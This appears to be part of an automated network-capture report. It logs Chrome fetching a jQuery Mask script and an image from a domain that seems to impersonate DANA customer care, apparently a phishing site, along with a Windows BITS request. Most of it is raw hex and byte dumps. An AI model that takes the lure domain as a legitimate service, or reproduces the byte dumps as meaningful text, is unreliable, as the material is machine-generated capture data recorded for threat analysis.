                                                  2024-10-13 17:33:28 UTC1369INData Raw: aa cf 4d 4e 4e 16 3e b3 33 3c 3c bc 1f c9 87 f3 7e be 80 5c 6c 0e 58 02 3c cf bb 32 43 e1 cf 72 ab c6 fc 14 64 56 b7 c6 75 dd 8b 72 4a 97 24 a9 aa 0f 90 2c 5d 9f 9c 64 45 55 1f cf f3 59 5d d7 7d 47 d1 cf 95 85 52 0f d2 43 c8 d4 ab ea b3 ce 82 90 9c 02 d0 6a 73 be 57 44 96 47 e4 99 44 3e 0b 82 db 01 1c 25 22 a5 de 93 44 f2 08 92 5b 73 18 58 b3 04 13 04 99 e8 16 61 d3 6e 17 89 ba 4f cb a3 e2 fd 4f f3 8f c9 c9 c9 e3 d0 ba 72 10 c0 39 22 72 48 d9 95 03 00 44 e4 b7 8e e3 f4 90 dc d8 62 52 3f cb 45 20 cb 6c 98 d2 12 bb aa 3e 1a 89 97 87 19 d3 59 ad ac aa ee 68 31 bd 11 76 b1 e5 76 92 6f 6f e1 d9 bb ee b9 bb 42 60 11 99 a4 ef d8 b3 51 b8 59 0e 21 55 f5 d6 1c f2 66 e4 ef 56 b6 b0 df 23 22 cb bb 61 81 2c 09 11 d9 30 3d 3d fd 8a 26 a2 3e d5 cd cf 5d 7a 48 1e 95 e6
                                                  Data Ascii: MNN>3<<~\lX<2CrdVurJ$,]dEUY]}GRCjsWDGD>%"D[sXanOOr9"rHDbR?E l>Yh1vvooB`QY!UfV#"a,0==&>]zH
                                                  2024-10-13 17:33:28 UTC1369INData Raw: c4 bd 2a 63 dc 24 3c 92 47 92 5c 12 d7 7a a8 6a d8 f5 5a 92 21 cd 4d 45 95 bb a5 8b 20 b9 7f cc a2 9c cb 60 7d 21 08 53 25 b9 27 43 e5 53 55 fd 7e 10 57 48 5e c0 e6 6c f7 7a 24 af b9 ee ba eb 1c 92 87 33 59 d9 fe 36 c8 eb b3 69 13 76 5d f7 03 45 95 b9 a5 0b 21 b9 39 a6 1e 7d 2d 12 e6 aa 8c 15 5c 49 7e 99 fb 56 bc 1d 92 67 ab ea bf a8 ea 6e fa 6b 1a 6e f0 6f 5a 55 07 49 de 45 f2 0d 24 7b c2 38 aa 7a 73 9d 3c 6a 86 7c a9 5b ab 8d 1b 37 96 ce f6 af a5 e4 90 7c 47 4c 25 9b 22 79 b0 11 a6 5f 55 77 a5 ad 88 a4 df 05 22 b9 8d e4 ef 33 61 f6 2a 46 96 c3 e9 2b 4b bd 4a af 24 57 05 e1 ff 39 83 48 77 b6 ab 0c e7 3b 0b 7e 0b 42 50 81 7f 03 20 6a 9d e3 5e 00 67 07 bb 85 41 f2 54 00 bf 04 90 d9 ff 39 7d d3 3f 3b 00 3c a8 aa 9b 1d c7 19 51 d5 03 1c c7 39 15 c0 7a 00 8b
                                                  Data Ascii: *c$<G\zjZ!ME `}!S%'CSU~WH^lz$3Y6iv]E!9}-\I~VgnknoZUIE${8zs<j|[7|GL%"y_Uw"3a*F+KJ$W9Hw;~BP j^gAT9}?;<Q9z
                                                  2024-10-13 17:33:28 UTC1369INData Raw: d5 ea 2c 65 0d e4 bb 85 fe a0 3a 0b c3 00 50 a9 54 46 13 ee cf 5c 67 93 5d cd a0 8c bf 15 fc 06 80 83 9a 49 07 00 44 24 34 88 27 00 b6 35 9b 4e 5a da e9 f9 74 3c fc 51 ad 56 a7 e3 02 90 1c 14 91 25 00 0e 12 91 5d 71 61 00 bf 35 02 10 b6 18 da db db 9b a9 79 8e e1 1b c1 ff 02 a0 5e 5a e7 44 fe fe 78 33 ad 88 aa fe 22 63 94 86 0a 72 e8 a1 87 86 69 7f 0e fe 6c 0f e0 3f cf 83 24 d7 64 c8 6b 18 a8 fb 11 9b 0c 7f 88 88 97 21 5d 93 4d 81 6c 10 91 db 44 a4 6e 0b 5a 0f 11 d9 8d 40 66 00 3d 6c 30 e1 51 5a 5c d7 3d df 68 52 4f 8d de 27 f9 64 d0 4c 36 fc 9a 70 b6 fd db 3f 6a 55 36 46 5c 97 6d d8 b0 21 f6 8b ae aa 23 41 90 27 8c e0 5f cf 98 d7 a2 a0 fb b3 9b be 37 ab 90 c4 2e 22 c9 81 46 5d 2c 06 e3 36 cf f3 fe 38 f8 7b c2 48 5b 49 2e 4e 29 df 15 24 39 3d 3d bd 3e e1
                                                  Data Ascii: ,e:PTF\g]ID$4'5NZt<QV%]qa5y^ZDx3"cril?$dk!]MlDnZ@f=l0QZ\=hRO'dL6p?jU6F\m!#A'_7."F],68{H[I.N)$9==>
                                                  2024-10-13 17:33:28 UTC960INData Raw: cb 5a 15 6c 7c 7c dc 1c c0 aa 88 cc fa 02 05 15 57 48 ee a9 93 cc c9 c6 ef ad c1 ff f7 c2 ff 22 9f 52 27 9e f9 45 8d ad 94 69 0e 68 79 9e b7 3a f8 b9 5f a3 b0 41 9a df 03 70 85 71 29 6c 49 96 01 c0 b2 65 89 0b dc ad d6 91 1b 4d 31 98 83 5b ea 15 2b 56 7c ce f8 73 4f 57 fa 80 a7 7f 70 29 e4 8c b8 30 c1 a1 a7 90 7a 1b 1a df 91 e7 57 88 b3 17 af e6 6c 63 67 30 c1 a0 aa 77 d6 4b c7 dc 96 4e 32 9c 02 7d bc 5e 1c 92 33 e7 64 6a b5 da ef 26 84 49 b3 d5 24 5c e0 ab 3b dd 1c 13 ef 4b 91 96 64 2c f8 3f a9 05 31 77 32 64 6e 41 00 20 38 0c 15 72 57 33 69 44 64 32 0f c1 bd b4 d5 f4 0a 81 e4 9b 8d 87 48 dc bb 4f 72 93 11 ee b7 49 e1 54 75 ca a8 58 e7 35 2b 97 d9 3c 27 ad 34 93 fc 42 10 e4 2b f5 d2 da b3 67 8f b9 ca 1c 52 77 a3 a0 eb ba ef 37 c2 7e 32 21 ff a7 53 28 48
                                                  Data Ascii: Zl||WH"R'Eihy:_Apq)lIeM1[+V|sOWp)0zWlcg0wKN2}^3dj&I$\;Kd,?1w2dnA 8rW3iDd2HOrITuX5+<'4B+gRw7~2!S(H


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  14192.168.2.449770172.67.207.1784435440C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:33:28 UTC585OUTGET /ast/jquery.mask.min.js HTTP/1.1
                                                  Host: bantuan-customer-care-dana.officio.asia
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: */*
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: script
                                                  Referer: https://bantuan-customer-care-dana.officio.asia/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-13 17:33:28 UTC698INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:33:28 GMT
                                                  Content-Type: text/javascript
                                                  Content-Length: 7920
                                                  Connection: close
                                                  Last-Modified: Mon, 12 Jun 2023 16:21:48 GMT
                                                  Cache-Control: max-age=14400
                                                  CF-Cache-Status: HIT
                                                  Age: 7076
                                                  Accept-Ranges: bytes
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5rPiyk63rjGmnJ0eZy65tOoB09MiXqxoVvVSNUB3yQPhajt0huXgl%2B6DVGwKYLS0pQaOW9QNHKnUuLF97V1ItIFm5JpgmWDVhNYfYdWSYQWeAIaXY%2BjYr8DS220XOyWE5x1hnhY%2ByKoFEYJClG84ut9kEN%2Bkxk0xhVY%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8d21132b6d7d5e6e-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-10-13 17:33:28 UTC671INData Raw: 76 61 72 20 24 6a 73 63 6f 6d 70 3d 7b 73 63 6f 70 65 3a 7b 7d 2c 66 69 6e 64 49 6e 74 65 72 6e 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 6c 2c 64 29 7b 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 26 26 28 61 3d 53 74 72 69 6e 67 28 61 29 29 3b 66 6f 72 28 76 61 72 20 70 3d 61 2e 6c 65 6e 67 74 68 2c 68 3d 30 3b 68 3c 70 3b 68 2b 2b 29 7b 76 61 72 20 62 3d 61 5b 68 5d 3b 69 66 28 6c 2e 63 61 6c 6c 28 64 2c 62 2c 68 2c 61 29 29 72 65 74 75 72 6e 7b 69 3a 68 2c 76 3a 62 7d 7d 72 65 74 75 72 6e 7b 69 3a 2d 31 2c 76 3a 76 6f 69 64 20 30 7d 7d 7d 3b 24 6a 73 63 6f 6d 70 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3f 4f
                                                  Data Ascii: var $jscomp={scope:{},findInternal:function(a,l,d){a instanceof String&&(a=String(a));for(var p=a.length,h=0;h<p;h++){var b=a[h];if(l.call(d,b,h,a))return{i:h,v:b}}return{i:-1,v:void 0}}};$jscomp.defineProperty="function"==typeof Object.defineProperties?O
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 66 6f 72 28 70 3d 30 3b 70 3c 61 2e 6c 65 6e 67 74 68 2d 31 3b 70 2b 2b 29 7b 76 61 72 20 68 3d 61 5b 70 5d 3b 68 20 69 6e 20 64 7c 7c 28 64 5b 68 5d 3d 7b 7d 29 3b 64 3d 64 5b 68 5d 7d 61 3d 61 5b 61 2e 6c 65 6e 67 74 68 2d 31 5d 3b 70 3d 64 5b 61 5d 3b 6c 3d 6c 28 70 29 3b 6c 21 3d 70 26 26 6e 75 6c 6c 21 3d 6c 26 26 24 6a 73 63 6f 6d 70 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 64 2c 61 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 6c 7d 29 7d 7d 3b 0a 24 6a 73 63 6f 6d 70 2e 70 6f 6c 79 66 69 6c 6c 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6e 64 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 64 29 7b 72 65
                                                  Data Ascii: for(p=0;p<a.length-1;p++){var h=a[p];h in d||(d[h]={});d=d[h]}a=a[a.length-1];p=d[a];l=l(p);l!=p&&null!=l&&$jscomp.defineProperty(d,a,{configurable:!0,writable:!0,value:l})}};$jscomp.polyfill("Array.prototype.find",function(a){return a?a:function(a,d){re
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 6e 67 65 2e 6d 61 73 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 62 2e 64 61 74 61 28 22 63 68 61 6e 67 65 64 22 2c 21 30 29 7d 29 2e 6f 6e 28 22 62 6c 75 72 2e 6d 61 73 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 64 3d 3d 3d 63 2e 76 61 6c 28 29 7c 7c 62 2e 64 61 74 61 28 22 63 68 61 6e 67 65 64 22 29 7c 7c 62 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 3b 62 2e 64 61 74 61 28 22 63 68 61 6e 67 65 64 22 2c 21 31 29 7d 29 2e 6f 6e 28 22 62 6c 75 72 2e 6d 61 73 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 64 3d 63 2e 76 61 6c 28 29 7d 29 2e 6f 6e 28 22 66 6f 63 75 73 2e 6d 61 73 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 21 30 3d 3d 3d 66 2e 73 65 6c 65 63 74 4f 6e 46 6f 63 75 73 26 26 61 28 62 2e 74 61 72 67 65 74 29 2e 73 65 6c 65 63 74 28 29 7d 29
                                                  Data Ascii: nge.mask",function(){b.data("changed",!0)}).on("blur.mask",function(){d===c.val()||b.data("changed")||b.trigger("change");b.data("changed",!1)}).on("blur.mask",function(){d=c.val()}).on("focus.mask",function(b){!0===f.selectOnFocus&&a(b.target).select()})
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 2d 2d 29 63 2e 6d 61 73 6b 44 69 67 69 74 50 6f 73 4d 61 70 4f 6c 64 5b 6b 5d 26 26 6c 2b 2b 3b 67 3e 64 3f 67 3d 31 30 2a 65 3a 66 3e 3d 67 26 26 66 21 3d 3d 64 3f 63 2e 6d 61 73 6b 44 69 67 69 74 50 6f 73 4d 61 70 4f 6c 64 5b 67 5d 7c 7c 28 66 3d 67 2c 67 3d 67 2d 28 6c 2d 68 29 2d 61 2c 63 2e 6d 61 73 6b 44 69 67 69 74 50 6f 73 4d 61 70 5b 67 5d 26 26 28 67 3d 66 29 29 3a 67 3e 66 26 26 0a 28 67 3d 67 2b 28 68 2d 6c 29 2b 6d 29 7d 72 65 74 75 72 6e 20 67 7d 2c 62 65 68 61 76 69 6f 75 72 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 66 3d 66 7c 7c 77 69 6e 64 6f 77 2e 65 76 65 6e 74 3b 63 2e 69 6e 76 61 6c 69 64 3d 5b 5d 3b 76 61 72 20 65 3d 62 2e 64 61 74 61 28 22 6d 61 73 6b 2d 6b 65 79 63 6f 64 65 22 29 3b 69 66 28 2d 31 3d 3d 3d 61 2e 69 6e 41 72 72 61 79
                                                  Data Ascii: --)c.maskDigitPosMapOld[k]&&l++;g>d?g=10*e:f>=g&&f!==d?c.maskDigitPosMapOld[g]||(f=g,g=g-(l-h)-a,c.maskDigitPosMap[g]&&(g=f)):g>f&&(g=g+(h-l)+m)}return g},behaviour:function(f){f=f||window.event;c.invalid=[];var e=b.data("mask-keycode");if(-1===a.inArray
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 5d 2e 61 70 70 6c 79 28 74 68 69 73 2c 63 29 7d 3b 71 28 22 6f 6e 43 68 61 6e 67 65 22 2c 21 30 3d 3d 3d 67 2c 6d 29 3b 71 28 22 6f 6e 4b 65 79 50 72 65 73 73 22 2c 21 30 3d 3d 3d 67 2c 6d 29 3b 71 28 22 6f 6e 43 6f 6d 70 6c 65 74 65 22 2c 68 2e 6c 65 6e 67 74 68 3d 3d 3d 65 2e 6c 65 6e 67 74 68 2c 6d 29 3b 71 28 22 6f 6e 49 6e 76 61 6c 69 64 22 2c 30 3c 63 2e 69 6e 76 61 6c 69 64 2e 6c 65 6e 67 74 68 2c 5b 68 2c 61 2c 62 2c 63 2e 69 6e 76 61 6c 69 64 2c 66 5d 29 7d 7d 3b 62 3d 61 28 62 29 3b 76 61 72 20 6d 3d 74 68 69 73 2c 64 3d 63 2e 76 61 6c 28 29 2c 68 3b 65 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 65 3f 65 28 63 2e 76 61 6c 28 29 2c 76 6f 69 64 20 30 2c 62 2c 66 29 3a 65 3b 6d 2e 6d 61 73 6b 3d 65 3b 6d 2e 6f 70 74 69 6f 6e 73
                                                  Data Ascii: ].apply(this,c)};q("onChange",!0===g,m);q("onKeyPress",!0===g,m);q("onComplete",h.length===e.length,m);q("onInvalid",0<c.invalid.length,[h,a,b,c.invalid,f])}};b=a(b);var m=this,d=c.val(),h;e="function"===typeof e?e(c.val(),void 0,b,f):e;m.mask=e;m.options
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 62 2c 65 2c 66 29 7b 66 3d 66 7c 7c 7b 7d 3b 76 61 72 20 63 3d 61 28 62 29 2e 64 61 74 61 28 22 6d 61 73 6b 22 29 2c 64 3d 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 3b 62 3d 61 28 62 29 2e 76 61 6c 28 29 7c 7c 61 28 62 29 2e 74 65 78 74 28 29 3b 74 72 79 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 65 26 26 28 65 3d 65 28 62 29 29 2c 22 6f 62 6a 65 63 74 22 21 3d 3d 74 79 70 65 6f 66 20 63 7c 7c 64 28 63 2e 6f 70 74 69 6f 6e 73 29 21 3d 3d 64 28 66 29 7c 7c 63 2e 6d 61 73 6b 21 3d 3d 65 7d 63 61 74 63 68 28 74 29 7b 7d 7d 2c 68 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 2c 64 3b 61 3d 22 6f 6e
                                                  Data Ascii: function(b,e,f){f=f||{};var c=a(b).data("mask"),d=JSON.stringify;b=a(b).val()||a(b).text();try{return"function"===typeof e&&(e=e(b)),"object"!==typeof c||d(c.options)!==d(f)||c.mask!==e}catch(t){}},h=function(a){var b=document.createElement("div"),d;a="on
                                                  2024-10-13 17:33:28 UTC404INData Raw: 2c 31 36 2c 31 37 2c 31 38 2c 33 36 2c 33 37 2c 33 38 2c 33 39 2c 34 30 2c 39 31 5d 2c 74 72 61 6e 73 6c 61 74 69 6f 6e 3a 7b 30 3a 7b 70 61 74 74 65 72 6e 3a 2f 5c 64 2f 7d 2c 39 3a 7b 70 61 74 74 65 72 6e 3a 2f 5c 64 2f 2c 6f 70 74 69 6f 6e 61 6c 3a 21 30 7d 2c 22 23 22 3a 7b 70 61 74 74 65 72 6e 3a 2f 5c 64 2f 2c 72 65 63 75 72 73 69 76 65 3a 21 30 7d 2c 41 3a 7b 70 61 74 74 65 72 6e 3a 2f 5b 61 2d 7a 41 2d 5a 30 2d 39 5d 2f 7d 2c 0a 53 3a 7b 70 61 74 74 65 72 6e 3a 2f 5b 61 2d 7a 41 2d 5a 5d 2f 7d 7d 7d 3b 61 2e 6a 4d 61 73 6b 47 6c 6f 62 61 6c 73 3d 61 2e 6a 4d 61 73 6b 47 6c 6f 62 61 6c 73 7c 7c 7b 7d 3b 68 3d 61 2e 6a 4d 61 73 6b 47 6c 6f 62 61 6c 73 3d 61 2e 65 78 74 65 6e 64 28 21 30 2c 7b 7d 2c 68 2c 61 2e 6a 4d 61 73 6b 47 6c 6f 62 61 6c 73 29
                                                  Data Ascii: ,16,17,18,36,37,38,39,40,91],translation:{0:{pattern:/\d/},9:{pattern:/\d/,optional:!0},"#":{pattern:/\d/,recursive:!0},A:{pattern:/[a-zA-Z0-9]/},S:{pattern:/[a-zA-Z]/}}};a.jMaskGlobals=a.jMaskGlobals||{};h=a.jMaskGlobals=a.extend(!0,{},h,a.jMaskGlobals)


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  15192.168.2.449765184.28.90.27443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:33:28 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  Accept-Encoding: identity
                                                  User-Agent: Microsoft BITS/7.8
                                                  Host: fs.microsoft.com
                                                  2024-10-13 17:33:28 UTC467INHTTP/1.1 200 OK
                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                  Content-Type: application/octet-stream
                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                  Server: ECAcc (lpl/EF70)
                                                  X-CID: 11
                                                  X-Ms-ApiVersion: Distribute 1.2
                                                  X-Ms-Region: prod-neu-z1
                                                  Cache-Control: public, max-age=169927
                                                  Date: Sun, 13 Oct 2024 17:33:28 GMT
                                                  Connection: close
                                                  X-CID: 2


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  16192.168.2.449768172.67.207.1784435440C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-13 17:33:28 UTC642OUTGET /ast/img/load_bg.png HTTP/1.1
                                                  Host: bantuan-customer-care-dana.officio.asia
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: image
                                                  Referer: https://bantuan-customer-care-dana.officio.asia/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-10-13 17:33:28 UTC690INHTTP/1.1 200 OK
                                                  Date: Sun, 13 Oct 2024 17:33:28 GMT
                                                  Content-Type: image/png
                                                  Content-Length: 7863
                                                  Connection: close
                                                  Last-Modified: Mon, 12 Jun 2023 16:23:04 GMT
                                                  Cache-Control: max-age=14400
                                                  CF-Cache-Status: HIT
                                                  Age: 7075
                                                  Accept-Ranges: bytes
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zKz3Xl4NJRab1rCLId448lYFg0XdpkK%2Fj4S9YhV8caXYbMQ1IIHpiaQcfQaMyOe85R7FvExkUC5urMpyVDuntGgCdcAm2tgyCdYhdvXKNAOUSAXZs%2FiWGiIsGnrO6HmfyMvxy0GIBvhAQwUWHOG8SjoFQk8E%2B4kbQtw%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8d21132b8be143b2-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-10-13 17:33:28 UTC679INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 01 2c 08 04 00 00 00 d3 74 46 fe 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 02 62 4b 47 44 00 ff 87 8f cc bf 00 00 00 07 74 49 4d 45 07 e6 0b 01 06 0c 01 1c 9a 07 63 00 00 1d 8b 49 44 41 54 78 da ed 9d d9 6f 64 47 76 a7 bf 73 6f 6e cc 4c 92 c9 2d b9 6f b5 48 55 25 95 aa 54 da bb 5b 52 6b 6d 61 ba a7 0d 5b f0 8b fb c1 f0 c3 3c ce f2 34 c0 60 80 99 bf c0 2f f3 34 b0 81 01 c6 30 da 63 f7 00 83 6e 60 ec 1e 49 2d 95 dd b2 d4 56 ab a4 5a 54 7b 15 c9 e2 be 6f c9 25 d7 1b f3 90 cc 22 8b 64 92 99 cc e5 de cb 8c 8f 28 56 ee 8c 88 fc dd 13 27 4e 9c 88 10 34
                                                  Data Ascii: PNGIHDR,,tFgAMAa cHRMz&u0`:pQ<bKGDtIMEcIDATxodGvsonL-oHU%T[Rkma[<4`/40cn`I-VZT{o%"d(V'N4
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 90 64 91 5b dc 63 ce 7d b5 74 9b b0 7c 74 72 8e 13 34 21 ee 6b ec 23 20 28 96 19 e2 26 53 ee ea 18 dd 24 ac 3a 06 39 cb 00 41 8e 87 3f 55 28 02 6c 30 c2 6d 46 d8 b0 bb 30 c5 14 da 0d 04 38 c1 73 f4 e1 af 29 49 ed 44 48 30 c6 35 86 dc 11 ad 77 83 b0 02 0c 72 91 9e 1d b3 7c b5 4a 56 5c 57 19 76 be b8 9c 2e 2c 3f 27 b8 48 1f 3e 6a ab fb cb 87 00 49 46 b9 ca 10 09 bb 0b 73 58 41 9d 8a 49 3f 2f 30 58 c3 dd 5f 3e 84 24 c3 7c cd 23 e7 46 e9 9d 2a 2c a1 83 4b 3c 4d 48 8b 2a 0f c2 3a 77 f9 96 29 67 b6 90 33 85 d5 c4 79 ce d3 8c ee fe 0e 42 80 25 6e 70 83 45 bb 8b b2 7f e1 9c 85 9f 67 b8 44 3b 86 16 55 01 08 16 b3 7c c3 77 4e f3 b8 9c 25 2c a1 87 57 39 89 57 8b aa 08 84 14 c3 7c c1 b8 93 5a cd b4 bb 00 3b 08 f3 12 6f d3 83 61 77 41 5c 87 41 1b 83 78 59 74 4e 74 de
                                                  Data Ascii: d[c}t|tr4!k# (&S$:9A?U(l0mF08s)IDH05wr|JV\Wv.,?'H>jIFsXAI?/0X_>$|#F*,K<MH*:w)g3yB%npEgD;U|wN%,W9W|Z;oawA\AxYtNt
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 0b 89 57 68 6a 96 41 3a f2 3f 99 5f 58 c2 39 bd 59 ad 26 2f 8a 30 67 f3 e7 3a e4 17 56 13 a7 ec 2e bb c6 e1 9c a2 25 df 53 f9 85 f5 34 cd da 5e 69 0e 40 d1 cc e9 7c 4f e6 13 56 58 9f df a5 39 14 e1 59 ea f7 7f 2a 9f 78 fa f5 ae ed 9a 43 51 b4 e4 0b 3a ec 2f 2c 0f a7 0b 49 8d d0 d4 3c 3e 9e da 3f e8 b0 bf b0 da f4 44 8e a6 20 14 7d b4 ee f7 c4 fe c2 1a d4 89 7d 9a 82 50 84 f7 df d7 61 3f 61 d5 71 4a 2f 9c d0 14 88 c1 29 82 fb 3d bc 97 1e a2 da 5e 69 0a 44 11 dd 6f f1 bd b1 cf 23 83 7a 86 50 53 30 8a 00 27 f6 f6 70 7b 85 15 2e 7e 2f 24 4d 8d 33 b8 77 93 a3 bd c2 ea a6 51 db 2b 4d 11 28 1a f6 1e 2a b8 57 58 83 3a 15 59 53 24 7e 06 77 4f 47 ef 16 56 44 6f 54 a4 29 1a 45 cf ee ed 42 76 0b ab 4d 2f a5 2f 1d 41 1e 5f c0 3b 6f 03 6a eb c7 7a fc a3 72 af 33 44 dc
                                                  Data Ascii: WhjA:?_X9Y&/0g:V.%S4^i@|OVX9Y*xCQ:/,I<>?D }}Pa?aqJ/)=^iDo#zPS0'p{.~/$M3wQ+M(*WX:YS$~wOGVDoT)EBvM//A_;ojzr3D
                                                  2024-10-13 17:33:28 UTC1369INData Raw: c0 2b db c0 67 88 4a 58 75 46 a7 bf d1 33 18 fe 51 ff b3 5d a7 fb 1a 1a 9c d6 f1 ed d7 0a 8e a7 1b df b6 b0 4c 1c 69 f8 77 b2 d5 c9 ed 23 17 d3 8c 46 a3 d1 57 9e fb d9 dc 8d 91 6f 26 ae 2d 4c c7 c7 36 36 32 29 6b 5f ef 4b 00 0c 39 19 3c 15 6e 0f 3c df 7e a6 a3 ab a5 b5 29 14 2e e7 d4 71 a5 5b c1 e1 04 b3 19 7d 59 61 85 9c be a4 5e 10 51 ca 73 40 52 b8 cf d7 d3 dd d3 fd 4e 72 7d 7d 25 36 34 35 bc 30 15 1b 5a 9d de 5c 48 26 ad 0c 4a 29 25 e2 91 16 df 33 91 68 b0 de d7 54 77 69 30 da 1c ac 0b 04 dc 22 a8 9d 2d e1 70 4c 42 ac e4 84 d5 4f c0 d9 17 43 b6 0b f4 1f 9a 89 e9 f3 f9 7c 4d 4d 03 7d 4a 59 56 22 b1 b6 be 19 cf 58 64 87 7b 62 48 c0 df 14 f1 78 0c c3 fe 88 54 09 2d 61 77 01 0e 46 e1 a7 97 c9 9c b0 9a f1 38 79 4c 98 a3 f0 46 15 31 cd 60 d0 99 23 bb 63 8e
                                                  Data Ascii: +gJXuF3Q]Liw#FWo&-L662)k_K9<n<~).q[}Ya^Qs@RNr}}%6450Z\H&J)%3hTwi0"-pLBOC|MM}JYV"Xd{bHxT-awF8yLF1`#c
                                                  2024-10-13 17:33:28 UTC1369INData Raw: 49 92 c9 99 b9 db 8f 7e 37 fa d1 e4 b5 d5 b5 8c a0 10 16 52 b9 05 6a aa 6c 7b 78 29 12 5b d6 59 18 4f fc d7 9b 7f fb e8 67 83 cd 75 7f 79 67 c3 51 36 7b 4f a1 67 73 a1 76 cf e3 87 a6 9c bd d4 3e a3 e0 d6 fa af ae 9f ee 7f d2 9d ad 1e f1 f8 fc c2 d0 d4 af ef 7e 39 fb c5 52 72 2b c4 a9 78 bc 3f ea d6 ab ca 6f f4 b3 9f 78 2b f6 9f af e3 f4 65 70 16 93 b9 06 d8 76 d8 17 48 e0 88 6e 66 7f 44 40 a9 ff 7e af f3 b3 3f fe 41 63 63 75 ff 76 22 be bc 7a 63 e8 f2 d0 c7 93 0f 37 92 96 df b0 65 2b 50 67 4b 2a 4b 92 85 dc cd 6d 61 c5 58 a4 db a9 5e 96 a0 94 29 16 33 a9 ff 74 e5 fe e2 9f be f2 f4 09 b3 2a 63 d8 74 7a 79 f9 de e8 df df f9 7c e6 de fa 62 aa d9 5b 67 24 ac 75 2b a3 1c ed 8e da 85 b0 44 6c fb ce f6 ad 7f c5 25 e7 b6 57 ae a0 86 28 75 26 f4 1f ce 7f f8 5a 53
